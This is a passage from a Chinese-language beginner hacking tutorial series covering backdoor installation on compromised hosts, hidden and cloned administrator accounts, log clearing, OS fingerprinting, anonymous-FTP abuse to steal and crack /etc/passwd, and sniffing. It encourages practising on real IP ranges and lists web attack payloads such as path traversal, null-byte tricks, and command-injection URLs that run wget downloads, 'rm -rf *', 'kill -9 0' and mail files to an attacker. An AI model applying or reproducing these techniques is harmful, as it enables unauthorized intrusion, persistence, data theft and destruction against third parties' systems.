其中ip为你自己机器的ip,且上传文件要与TFTP服务器端在同一目录下,这样你就可以把xinxin.exe上传到c盘abc目录下了(其实是从tftp服务器下载来的) 需要指出的是,如果使用代理IP,你将不能实现与外部网络的文件传送。因为你的代理网关在进行数据封装的时候会将自己的IP地址加入到你的数据报中,代替你的内部网络地址,所以在外部网络进行MAC寻址时是找不到你这台TFTP服务器的。 3 安置后门 如果你入侵还有其他目的,比如以破坏为主,或者是来修改主页的,那么这些事情当然可以在安置后门之前做;如果你只是想得到一只肉鸡,那就没什么可说的了,安后门吧 这个问题我在前面有讲过一点,但不详细.用的后门一般有:木马,asp木马,远程控制软件,克隆帐户,建立并隐藏帐户,telnet,telnet扩展的shell,终端服务等。安置一个好的后门通常要注意以下几点:(这是一个前辈写的我copy一下,很中肯的) 1 不会被防火墙查杀及阻碍通信:被加入病毒库的后门最好加壳以逃过防火墙,尽量用低端口通信,以免被防火墙屏蔽。 2 最大限度增加隐蔽性:如果你选择远程控制软件,要注意被控端的安装提示和小图标,以及是否同步画面;如果你在帐户上做文章,要尽量保持在cmd和用户管理中都不出破绽;如果你选择放木马或telnet扩展,要注意文件和进程的隐藏;如果新开了终端服务(入侵前并没有开),一定要该掉3389这个显眼的端口,且越低越好。 不要当管理员不存在:这是一个大忌,许多朋友在只有默认帐户的机器上建立类似'hacking'的管理员帐户,真是无知者无畏呀。所以安置后门的时候,想想管理员疏忽的地方会在哪里。 4 打补丁 如果想独霸肉鸡,就要会打补丁,要知道对肉鸡的竞争是很激烈的。怎么打补丁呢?这个也要问?想想你是怎么进来的吧。算了,提示一下,除了修补大的漏洞以外(上传官方补丁并运行),也要注意它的共享,ipc$共享(最好都关闭),可疑端口,容易被利用的服务等。不过打补丁也要注意隐蔽性的,不要让管理员发现大的改动。 5 清除日志 可以手动或利用软件,如果不太会就去找相关教材吧,在这里我不详细介绍了。(上一篇我讲过一点) 好了,基本上就这么多了,今天就到这了,希望能给大家一些帮助 第16章 继续讲,从克隆帐号 讲起 前2天基本的一些东西都讲过了,今天我觉得得把克隆帐号这个问题讲清楚了 什么叫克隆帐号 ? 前辈说:在注册表中有两处保存了帐号的SID相对标志符,一处是SAM\Domains\Account \Users下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误,登陆时用的是后者,查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管理员权限但查询还是原来状态的情况 。即所谓的克隆帐号。(我想这个很明白的,如果还有这个问题,你去网络技术版块问吧) 说到克垄帐号就得说说SAM安全帐号管理器,详细的我就不重复了,因为呢多前辈写了很多很棒的文章,大家有兴趣就看看:http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1427 明白原理后就可以手动或者用现成的工具克隆帐号,用什么呢? 克隆ca.exe 下载(找了许久 啊)http://www.hejie.net/xz/list.asp?id=926 注意手动克隆需要SYSTEM权限(这句话大家应该能明白吧) 用什么呢?psu.exe 还是很棒的,下载:www.sometips.com/soft/psu.exe 第17章 怎么判断对方主机的操作系统呢? 今天我们就先说说这个问题。我先从最简单的PING看主机操作系统说起 一、用ping来识别操作系统 C:\>ping 10.1.1.2 Pinging 10.1.1.2 with 32 bytes of data: Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 Reply from 10.1.1.2: bytes=32 time<10ms TTL=128 Ping statistics for 10.1.1.2: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms C:\> C:\>ping 10.1.1.6 Pinging 10.1.1.6 with 32 bytes of data: Request timed out. Reply from 10.1.1.6: bytes=32 time=250ms TTL=237 Reply from 10.1.1.6: bytes=32 time=234ms TTL=237 Reply from 10.1.1.6: bytes=32 time=234ms TTL=237 Ping statistics for 10.1.1.6: Packets: Sent = 4, Received = 3, Lost = 1 (25% loss), Approximate round trip times in milli-seconds: Minimum = 234ms, Maximum = 250ms, Average = 179ms 我们跟据ICMP报文的TTL的值,我们就可以大概知道主机的类型。如:TTL=125左右的主机应该是windows系列的机子,TTL=235左右的主机应该是UINX系列的机子。如上面的两个例子,10.1.1.2就是win2000的机子,而10.1.1.6则是UINX(Sunos 5.8)的机子。这是因为不同操作系统的机子对ICMP报文的处理与应答是有所不同的,TTL值每过一个路由器会减1。所以造成了TTL回复值的不同。对于TTL值与操作系统类型的对应,还要*大家平时多注意观察和积累。 二、直接通过联接端口根据其返回的信息来判操作系统 这种方法应该说是用得最多的一种方法,下面我们来看几个实例。 1、如果机子开了80端口,我们可以telnet它的80端口。 C:\>telnet 10.1.1.2 80 输入get 回车(注意这里是盲打) 如果返回, HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.0 Date: Fri, 11 Jul 2003 02:31:55 GMT Content-Type: text/html Content-Length: 87 The parameter is incorrect. 遗失对主机的连接。 C:\> 那么这台就肯定是windows的机子。 如果返回, Method Not Implemented get to / not supported. Invalid method in request get Apache/1.3.27 Server at gosiuniversity.com Port 80 遗失对主机的连接。 C:\> 那么多数就是UINX系统的机子了。 2、如果机子开了21端口,我们可以直接FTP上去 C:\>ftp 10.1.1.2 如果返回, Connected to 10.1.1.2. 220 sgyyq-c43s950 Microsoft FTP Service (Version 5.0). User (10.1.1.2:(none)): 那么这就肯定是一台win2000的机子了,我们还可以知道主机名呢,主机名就是sgyyq-c43s950。这个FTP是windows的IIS自带的一个FTP服务器。 如果返回, Connected to 10.1.1.3. 220 Serv-U FTP Server v4.0 for WinSock ready... User (10.1.1.3:(none)): 也可以肯定它是windows的机子,因为Serv-U FTP是一个专为windows平台开发的FTP服务器。 如果返回, Connected to 10.1.1.3. 220 ready, dude (vsFTPd 1.1.0: beat me, break me) User (10.1.1.3:(none)): 那么这就是一台UINX的机子了。 3、如果开了23端口,这个就简单了,直接telnet上去。 如果返回, Microsoft ? Windows ? Version 5.00 (Build 2195) Welcome to Microsoft Telnet Service Telnet Server Build 5.00.99201.1 login: 那么这肯定是一台windows的机子了 如果返回, SunOS 5.8 login: 不用说了,这当然是一台UINX的机子了,并且版本是SunOS 5.8的 三、利用专门的软件来识别 这种有识别操作系统功能的软件,多数采用的是操作系统协议栈识别技术。这是因为不同的厂家在编写自己操作系统时,TCP/IP协议虽然是统一的,但对TCP/IP协议栈是没有做统一的规定的,厂家可以按自己的要求来编写TCP/IP协议栈,从而造成了操作系统之间协议栈的不同。因此我们可以通过分析协议栈的不同来区分不同的操作系统,只要建立起协议栈与操作系统对应的数据库,我们就可以准确的识别操作系统了。 下面是简单介绍两款有识别功能的软件,具体用法我就不说,你可以到网上去找找相应软件的说明使用 一是nmap,下载地址:http://www.linuxeden.com/download/indexsoft.php?category=syssecure 它采用的是主动式探测,探测时会主动向目标系统发送探测包,根据目标目标机回应的数据包来,叛断对方机的操作系统。 2、 天眼,采用的是被动式的探测方法。不向目标系统发送数据包,只是被动地探测网络上的通信数据,通过分析这些数据来判断操作系统的类型。配合supersan使用,较果很好。 下载地址 http://www.xfocus.net/tools/200206/天眼1.0.5.zip 第18章 从FTP入侵到SQL 怎么开头呢?每次我都要想很长时间,这主要是我写作文时留下的毛病,总是在开头时想很久。好,就从什么叫FTP开始说吧。大家都知道FTP,但很多人都讲不好它具体指什么,FTP是指文件传输协议,因特网上常用的文件传输协议,它使用户能够在两个联网计算机间实现文件传输,是因特网上传递文件最主要的方法。在使用FTP进行文件传输时,首先启动FTP客户端程序与远程主机建立连接,然后向远程主机发出传输命令,远程主机在收到命令后给予响应,并执行正确的命令。除此之外,FTP还提供登录、目录查询、文件操作及其他会话控制功能。很详细了吧,别老是认为FTP就是传文件的软件,呵呵 因为FTP是一种文件传输方式,所以要入侵它就有点困难了,一般现在都没什么用了,因为即使你取得了上传权限也无法直接执行程序,在UNIX或是早期一些主机上或许有一些溢出或是越权的漏洞。今天我们说这个是因为很多FTP都是可以匿名登陆的(各个高校的至少对校内的都是吧,也有严格的好像科大的就是需要很严格的认证,晕^^^),这就有文章做了 对了,说到这我想说一下FTP的一些基本命令,大家可能都知道,还是说一下 (以人为本嘛)很长的,希望大家耐性看 FTP命令: FTP的命令行格式为:ftp -v -d -i -n -g [主机名] , 其中 -v 显示远程服务器的所有响应信息; -n 限制ftp的自动登录,即不使用;.n etrc文件; -d 使用调试方式; -g 取消全局文件名。 FTP使用的内部命令如下(中括号表示可选项): 1.![cmd[args>:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip 2.$ macro-ame[args]:执行宏定义macro-name。 3.account[password]:提供登录远程系统成功后访问系统资源所需的补充口令。 4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。 5.ascii:使用ascii类型传输方式。 6.bell:每个命令执行完毕后计算机响铃一次。 7.bin:使用二进制文件传输方式。 8.bye:退出ftp会话过程。 9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。 10.cd remote-dir:进入远程主机目录。 11.cdup:进入远程主机目录的父目录。 12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。 13.close:中断与远程服务器的ftp会话(与open对应)。 14.cr:使用asscii方式传输文件时,将回车换行转换为回行。 15.delete remote-file:删除远程主机文件。 16.debug[debug-value]:设置调试方式,显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。 17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件 18.disconnection:同close。 19.form format:将文件传输方式设置为format,缺省为file方式。 20.get remote-file[local-file]:将远程主机的文件remote-file传至本地硬盘的local-file。 21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。 22.hash:每传输1024字节,显示一个hash符号(#)。 23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。 24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。 25.image:设置二进制传输方式(同binary)。 26.lcd[dir]:将本地工作目录切换至dir。 27.ls[remote-dir][local-file]:显示远程目录remote-dir,并存入本地文件local-file。 28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。 29.mdelete[remote-file]:删除远程主机文件。 30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile 。 31.mget remote-files:传输多个远程文件。 32.mkdir dir-name:在远程主机中建一目录。 33.mls remote-file local-file:同nlist,但可指定多个文件名。 34.mode[modename]:将文件传输方式设置为modename,缺省为stream方式。 35.modtime file-name:显示远程主机文件的最后修改时间。 36.mput local-file:将多个文件传输至远程主机。 37.newer file-name:如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。 38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。 39.nmap[inpattern outpattern]:设置文件名映射机制,使得文件传输时,文件中的某些字符相互转换,如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。该命令特别适用于远程主机为非UNIX机的情况。 40.ntrans[inchars[outchars>:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。 41.open host[port]:建立指定ftp服务器连接,可指定连接端口。 42.passive:进入被动传输方式。 43.prompt:设置多个文件传输时的交互提示。 44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令,该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。 45.put local-file[remote-file]:将本地文件local-file传送至远程主机。 46.pwd:显示远程主机的当前工作目录。 47.quit:同bye,退出ftp会话。 48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst. 49.recv remote-file[local-file]:同get。 50.reget remote-file[local-file]:类似于get,但若local-file存在,则从上次传输中断处续传。 51.rhelp[cmd-name]:请求获得远程主机的帮助。 52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态,否则显示文件状态。 53.rename[from][to]:更改远程主机文件名。 54.reset:清除回答队列。 55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。 56.rmdir dir-name:删除远程主机目录。 57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1,.2等。 58.send local-file[remote-file]:同put。 59.sendport:设置PORT命令的使用。 60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。 61.size file-name:显示远程主机文件大小,如:site idle 7200。 62.status:显示当前ftp状态。 63.struct[struct-name]:将文件传输结构设置为struct-name,缺省时使用stream结构。 64.sunique:将远程主机文件名存储设置为只一(与runique对应)。 65.system:显示远程主机的操作系统类型。 66.tenex:将文件传输类型设置为TENEX机的所需的类型。 67.tick:设置传输时的字节计数器。 68.trace:设置包跟踪。 69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。 70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3 71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。 72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on. 73.?[cmd]:同help. 上面的命令我建议大家最好下下来,背熟了很有用的。上面说到很多FTP都有提供匿名FTP的服务,而方便和安全性却是鱼与熊掌不能两得的!!很多 系统管理员都为了避免麻烦就用系统的预设设定来提供FTP这个服务.而anonymous ftp却 是有许多漏洞的,这样我们就有的说了啊。 允许用户使用Anonymous或FTP作为用户名以用户信箱做为口令(确切的说是任何带@的口令)登陆到系统。虽说匿名FTP本身 并不是个漏洞,因为匿名区域里放置有/etc/passwd和/etc/group文件,往往可能因为管理员配置上的大意造成潜在的安全隐患。使用匿名的FTP,用户可以匿名登陆FTP服务器。登陆时需要用户提供完整的E-mail地址做为passwd,其实在很多站点上这个要求形同虚设,你只要在其中包含有@字节看起来像个E-mail地址就行了,主机不会对口令做任何效验的。 远程所提供FTP服务的主机在处理匿名用户的命令时,一般都会执行一个chroot命令让匿名者进入主机所允许的匿名FTP区域。然而为了支持匿名FTP和用户FTP,FTP服务器要访问所有文件,也就证明了FTP服务器不是总在chroot环境中运行的。(一位前辈说的,我不知道还有哪个说的能比这还精辟)这个环节会让一些管理员不知所为而未曾理会,很容易被我们利用而得到一个匿名FTP用户所不能得到的权限。当然解决也很简单,可以通过修改inetd的配置来替代直接启动FTP服务器,它执行chroot(就类似于chrootuid的程序),然后再启动服务器就可以了。 一般情况下,FTP只限于在匿名用户下访问,匿名用户有其正常的权限,在启动服务器前执行chroot就意味着匿名用户将受到限制。如果说一个匿名用户在FTP服务器的匿名区域获得了一份不应该是匿名用户获得的文件,那么就说明了可能有内部客户将这个文件放置在匿名的FTP区域了。匿名用户可以阅读到/etc/passwd文件这就是管理员很大错误表现。还有隐患是telnet到ftp21如果允许执行SITE CHMOD和SITE EXEC、/home的所有者是匿名FTP的用户,那么随便就可把权限设置成****或者更多的进行修改等等。 为了方便我们用个小软件,其实不要软件也可以,但用一下方便大家嘛 FTP scanner(下载:http://sorry.vse.cz/~xmicm08/FTPScanner/) 安装好后,我们从开始菜单中的程序中找到FTP Scanner并运行它。我们熟悉一下我们要使用的软件的界面。打开软件我们可以看到 :Host 主机 ,Beginning ,开始IP 下面有几个文本框 我们在这里填入我们要开始扫描的IP.Ending 结束IP .我们在这里填入我们结束扫描的IP.在下面有一个 Threads 线程 。我们可以根据网速来选择这里的线程数.通常Moden上网选为50--70左右.更快的话选到100个线程.然后我们选择菜单Session 里的Begin FTP scan 就可以开始了扫描了..】 注意:我们可以在View 里的options选项里选择我们的扫描参数. 在Login config里 里的UserName 和 Password我们通常不用更改. 但你也可以改动他. 比如你想扫描特定的帐号.比如扫描用户 Oracle密码也是Oracle的话 就改动这里的 UserName 和 Password 在IP Logging里 我们可以更改扫描结果存放的位置. 随便选择一个位置和文件名就可以了. 默认是存放在安装目录下面的iplog.txt文件. 下面我想大家也会用吧,就是找个主机试试,注意和命令一起用,如果在打开的网页里不能写权限,那就把密码档先当下来. ftp> get /etc/passwd ,然后用小榕的流光提取用户,再找个一个可以利用的shell,就OK了,用找到的用户名和密码登陆,想干什么就干什么了,建议大家装个后门,因为一般管理员很快就会发现的。当然,很多主机更离谱的是.anonymous竟然有到根目录和写的权限 好了,就说到这大家找几个IP段练练吧,国内这样的主机很多的 第19章 80端口攻击总结 今天我们来说说80端口的攻击方法,只是把大概的说一下,肯定有遗漏了. 我将描述每种攻击的作用,和其怎样利用这些漏洞进行攻击(注意host的意思你应该懂吧) (1)'.' '..' 和 '...' 请求 这些攻击痕迹是非常普遍的用于web应用程序和web服务器,它用于允许攻击者或者蠕虫病毒程序改变web服务器的路径,获得访问非公开的区域。大多数的CGI程序漏洞含有这些'..'请求。 Example: http://host/cgi-bin/lame.cgi?file=../../../../etc/motd 这个列子展示了攻击者请求mosd这个文件,如果攻击者有能力突破web服务器根目录,那么可以获得更多的信息,并进一步的获得特权。 (2)'%20' 请求 %20是表示空格的16进制数值,虽然这个并不代表你能够利用什么,但是在你浏览日志的时候会发现它,一些web服务器上运行的应用程序中这个字符可能会被有效的执行,所以,你应该仔细的查看日志。另一方面,这个请求有时可以帮助执行一些命令。 Example: http://host/cgi-bin/lame.cgi?page=ls%20-al| 这个列子展示了攻击者执行了一个unix的命令,列出请求的整个目录的文件,导致攻击者访问你系统中重要的文件,帮助他进一步取得特权提供条件。 (3)'%00' 请求 %00表示16进制的空字节,他能够用于愚弄web应用程序,并请求不同类型的文件。 Examples: http://host/cgi-bin/lame.cgi?page=index.html 这可能是个有效的请求在这个机子上,如果攻击者注意到这个请求动作成功,他会进一步寻找这个cgi程序的问题。 http://host/cgi-bin/lame.cgi?page=../../../../etc/motd 也许这个cgi程序不接受这个请求,原因在于它要检查这个请求文件的后缀名,如:html.shtml或者其他类型的文件。大多数的程序会告诉你所请求的文件类型无效,这个时候它会告诉攻击者请求的文件必须是一某个字符后缀的文件类型,这样,攻击者可以获得系统的路径,文件名,导致在你的系统获得更多的敏感信息 http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html 注意这个请求,它将骗取cgi程序认为这个文件是个确定的可接受的文件类型,一些应用程序由于愚蠢的检查有效的请求文件,这是我们常用的方法。 (4)'|' 请求 这是个管道字符,在unix系统用于帮助在一个请求中同时执行多个系统命令。 Example: # cat access_log| grep -i '..' (这个命令将显示日志中的“..“请求,常用于发现我们和蠕虫攻击) 常可以看到有很多web应用程序用这个字符,这也导致IDS日志中错误的报警。 在你的程序仔细的检查中,这样是有好处的,可以降低错误的警报在入侵检测系统中。 下面给出一些列子: http://host/cgi-bin/lame.cgi?page=../../../../bin/ls| 这个请求命令执行,下面是一些变化的列子 http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc| 这个请求在unix系统中列出/etc目录的所有文件 http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i%20'lame' 这个请求cat命令的执行并且grep命令也将执行,查询出”lame' (5)';' 请求 在unix系统,这个字符允许多个命令在一行执行 Example: # id;uname -a (执行id命令后,紧跟着执行uname命令) 一些web程序用这个字符,可能导致在IDS日志中失败的警告,应该仔细的检查web程序,让IDS警报失败的几率降低 (6)'<' 和 '>' 请求 应该检查你的日志记录中这两个字符,众多的原因中,首要的一个是这个字符表明了添加数据在文件中 Example 1: # echo 'your hax0red h0 h0' >> /etc/motd (请求写信息在motd这个文件中) 一个攻击者可以容易的用象上面的这个请求篡改你的web页面。比如著名的RDS exploit常被攻击者用于更改web主页面。 Example 2: http://host/something.php=Hi%20mom%20Im%20Bold! 你会注意到这里html语言的标志,同样用了“〈”,“〉”字符,这种攻击不能导致攻击者对系统进行访问,它迷惑人们认为这是个合法的信息在web站点中(导致人们在访问这个联结的时候访问到攻击者设定的地址,这种请求可能会被转变成16进制的编码字符形式,使攻击的痕迹不那么明显) (7)'!'请求 这种字符请求常用语对SS(Server Side Include) I进行攻击,如果攻击者迷惑用户点击被攻击者设定的联结,和上面的一样。 Example: http://host1/something.php= 这个列子是攻击者可能会做的,它让一个host2站点上的文件看起来是来自于 host1上面的(当然,需要访问者访问这个被攻击者设定的联结。这种请求可能被转化成16进制的编码伪装,不易发现) 同时,这种方式也可以以web站点的权限执行命令 Example: http://host/something.php= 这个列子在远程的系统上执行“id'的命令,它将显示这个web站点用户的id,通常是”nobody'或者“www' 这种形式也允许包含隐藏文件。 Example: http://host/something.php= 这个隐藏文件.htpasswd不会被显示出来,Apache建立的规则会拒绝这种以.ht 形式的请求,而SSI标志会绕过这种限制,并导致安全问题 (8)' 这种攻击用于试图在远程的web应用程序中插入PHP程序,它可能允许执行命令,这取决于服务器的设置,和其他起作用的一些因素(比如php设置为安全模式) Example: http://host/something.php= 在某些简单的php应用程序中,它可能会在远程系统上以web站点用户的权限执行本地命令 (9)'`' 请求 这种字符后面常用在perl中执行命令,这个字符在web应用程序中不是经常的使用,所以,如果看到它在你的日志中,应该非常小心 Example: http://host/something.cgi=`id` 一个perl写的有问题的cgi程序,会导致执行id命令 下面是针对管理员说的,因为现在很多网管都在看这个,所以我觉得有必要写一点,当然也是让你知道你的对手有哪些着数了,呵呵.我只是罗列了一些攻击后的痕迹,当然不能罗列所有了 '/bin/ls' 这个命令请求整个路径,在很多的web应用程序中都有这个漏洞,如果你在日志中很多地方都看到这种请求,很大的可能性是存在远程执行命令漏洞,但并不一定是个问题,也可能是个错误的警报。再一次提醒,写好的web应用程序(cgi,asp,php...etc)是安全的基础 Example: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al| http://host/cgi-bin/bad.cgi?doh=ls%20-al; 'cmd.exe' 这是一个windows的shell,一个攻击者如果访问并运行这个脚本,在服务器设置允许的条件下可以在windows机器上做任何事情,很多的蠕虫病毒就是通过80端口,传播到远程的机器上 http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e: '/bin/id' 这是个2进制的文件,它的问题和/bin/ls一样,如果你在日志中很多地方都看到这种请求,很大的可能性是存在远程执行命令漏洞,但并不一定是个问题,也可能是个错误的警报。 它将显示属于哪个用户和属于哪个组 Example: http://host/cgi-bin/bad.cgi?doh=../../../../bin/id| http://host/cgi-bin/bad.cgi?doh=id; '/bin/rm' 这个命令可以删除文件,如果不正确的使用是非常危险的 Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*| http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*; 'wget and tftp' 命令 这些命令常被攻击者用来下载可能进一步获得特权的文件,wget是unix下的命令,可能被用来下载后门程序,tftp是unix和nt下的命令,用来下载文件。一些IIS蠕虫通过tftp来复制自身传播病毒到其他的主机 Examples: http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c; 'cat' 命令 这个命令用来查看文件内容,常用来读重要的信息,比如配置文件,密码文件,信用卡文件和你能够想到的文件 Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd| http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd; 'echo' 命令 这个命令常用于写数据到文件中,比如“index.html” Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20'fc-#kiwis%20was%20here'%20>>%200day.txt| http://host/cgi-bin/bad.cgi?doh=echo%20'fc-#kiwis%20was%20here'%20>>%200day.txt; 'ps' 命令 列出当前运行的进程,告诉攻击者远程主机运行了那些软件,以便从中得到一些安全问题的主意,获得进一步的权限 Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux| http://host/cgi-bin/bad.cgi?doh=ps%20-aux; 'kill and killall' 命令 在unix系统这个命令用于杀掉进程,一个攻击者可以用这个命令来停止系统服务和程序,同时可以擦掉攻击者的痕迹,一些exploit会产生很多的子进程 Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200| http://host/cgi-bin/bad.cgi?doh=kill%20-9%200; 'uname' 命令 这个命令告诉攻击者远程机器的名字,一些时候,通过这个命令知道web站点位于哪个isp,也许是攻击者曾今访问过的。通常uname -a来请求,这些都将记录在日志文件中 Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a| http://host/cgi-bin/bad.cgi?doh=uname%20-a; 'cc, gcc, perl, python, etc...' 编译/解释命令 攻击者通过wget或者tftp下载exploit,并用cc,gcc这样的编译程序进行编译成可执行程序,进一步获得特权 Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337; 如果你查看日志中发现有“perl” python”这些说明可能攻击者下载远程的perl ,python脚本程序,并试图本地获得特权 'mail' 命令 攻击者通常用这个命令将系统的一些重要文件发到攻击者自己的信箱,也肯能是进行邮件炸弹的攻击 Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@****cnhonker.org%20< 第20章 sniffer,今天开始说它了 sniffers(嗅探器)几乎和internet有一样久的历史了.他们是最早的一个允许系统管理员分析网络和查明哪里有错误发生的工具.但是这个工具也给我们带来很大的方便。今天我们看2个问题:1。什么是sniffer 2。如何防止sniffer的监听。似乎是矛盾的哦,呵呵,要2个方面都知道才能百战百胜嘛 什嘛是sniffer (抄定义的) 在单选性网络中, 以太网结构广播至网路上所有的机器, 但是只有预定接受信息包的那台计算机才会响应.不过网路上其他的计算机同样会"看到"这个信息包,但是如果他们不是预定的接受者,他们会排除这个信息包.当一台计算机上运行着sniffer的时候并且网络处于监听所有信息交通的状态, 那么这台计算机就有能力浏览所有的在网络上通过的信息包.(这个当然很爽了) 那你就有个问题谁使用这个呢?lan/wan 管理员使用sniffers来分析网络信息交通并且找出网络上何处发生问题.一个安全管理员可以同时用多种sniffers, 将它们放置在网络的各处,形成一个入侵警报系统.对于系统管理员来说sniffers是一个非常好的工具,当然还有我们大家了。那常见的sniffers 有哪些呢?很多,我常用的有Sniffer Pro。当然看一些文章介绍了snoop,但注意这是在UNIX下的,我没怎么用 过 ,所以就不说这个了。至于其他一些好用的,我想你学到现在了应该可以自己找了(上GOOGLE 或是BAIDU都可以,不然去www.yahoo.com也不错的)。 那怎么防止sniffer的监听? 显而易见的,保护网络不受sniffer监听的方法就是不要让它们进入.如果一个人不能通过你的系统进入的话,那么他们无法安装sniffers.当有人看上一个大多数网络通讯流通的中心区域(防火墙或是代理服务器)时,他们便确定这是他们的攻击目标并将被监视.一些可能的"受害者"在服务器的旁边,这时候个人信息将被截获(可能是各种信息甚至是密码) 一个好的方式来保护你的网络不受sniffer监视是将网络用以太网接线器代替普通的集线器分成尽可能多的段.接线器可以分割你的网络通讯并防止每一个系统"看到"每个信息包.坏处是这种东西太贵了,这个还是很重要的 另一个方法是,和那种接线器比就是加密术.Sniffer依然可以监视到信息的传送,但是显示的是乱码.但这个有问题就是网络会延迟,当然还有速度问题和使用一个弱加密术比较容易被攻破。 用一些软件也可以帮助你查出是不是有人在监视你,比如AntiSniff(很小的,但可以扫描你的网路并测试一台计算机是否运行在混杂模式(监听网路上每个数据包)什么意思?你看看上面的类容吧),下载:http://www.pdasky.com.cn/down.asp?id=2876&no=1 大家请注意,从今天开始我们就开始接触网络监听的内容,明天我讲的是各种网络监听技术,因为今天很晚了,所以。。还有就是这2天的内容可能牵涉到一些名词,我一般都会注解的(因为要照顾所有人嘛),但有的如果我没有注解的但你又不太明白的话,请到网络技术板块发贴,我会作出解答,请不要在此后跟贴。 第21章 网络监听技术分析?纯属理论 今天我们先说几个基本概念.首先,我们知道,一台接在以太网内的计算机为了和其他主机进行通讯,在硬件上是需要网卡,在软件上是需要网卡驱动程序的。而每块网卡在出厂时都有一个唯一的不与世界上任何一块网卡重复的硬件地址,称为mac地址。同时,当网络中两台主机在实现tcp/ip通讯时,网卡还必须绑定一个唯一的ip地址. 对我们来说,浏览网页,收发邮件等都是很平常,很简便的工作,其实在后台这些工作是依*tcp/ip协议族实现的,大家知道有两个主要的网络体系:OSI参考模型和TCP/IP参考模型,OSI模型即为通常说的7层协议,它由下向上分别为物理层、数据链路层、网络层、传输层、会话层、表示层、应用层,而tcp/ip模型中去掉了会话层和表示层后,由剩下的5层构成了互联网的基础,在网络的后台默默的工作着。 当局域网内(因为我们最常见的就是局域网)的主机都通过HUB等方式连接时,一般都称为共享式的连接(就是大家长说的共享),这种共享式的连接有一个很明显的特点:就是HUB会将接收到的所有数据向HUB上的每个端口转发,也就是说当主机根据mac地址进行数据包发送时,尽管发送端主机告知了目标主机的地址,但这并不意味着在一个网络内的其他主机听不到发送端和接收端之间的通讯,只是在正常状况下其他主机会忽略这些通讯报文而已!如果这些主机不愿意忽略这些报文,网卡被设置为promiscuous状态的话,那么,对于这台主机的网络接口而言,任何在这个局域网内传输的信息都是可以被听到的。如果网卡被设置为为混杂模式(promiscuous),主机将会默不作声的听到以太网内传输的所有信息,也就是说:窃听也就因此实现了! 对发生在局域网的其他主机上的监听,一直以来,都缺乏很好的检测方法。这是由于产生网络监听行为的主机在工作时总是不做声的收集数据包,几乎不会主动发出任何信息。但可惜的有些大虾们就爱动脑筋啊,现在已经有些方法了 1:反应时间 向怀疑有网络监听行为的网络发送大量垃圾数据包,根据各个主机回应的情况进行判断,正常的系统回应的时间应该没有太明显的变化,而处于混杂模式的系统由于对大量的垃圾信息照单全收,所以很有可能回应时间会发生较大的变化。这个方法很好,但有时候也没用因为大家没经验嘛 2:观测dns 许多的网络监听软件都会尝试进行地址反向解析,在怀疑有网络监听发生时可以在dns系统上观测有没有明显增多的解析请求。没DNS的或者不能接触的就有点郁闷了 3:利用ping模式进行监测 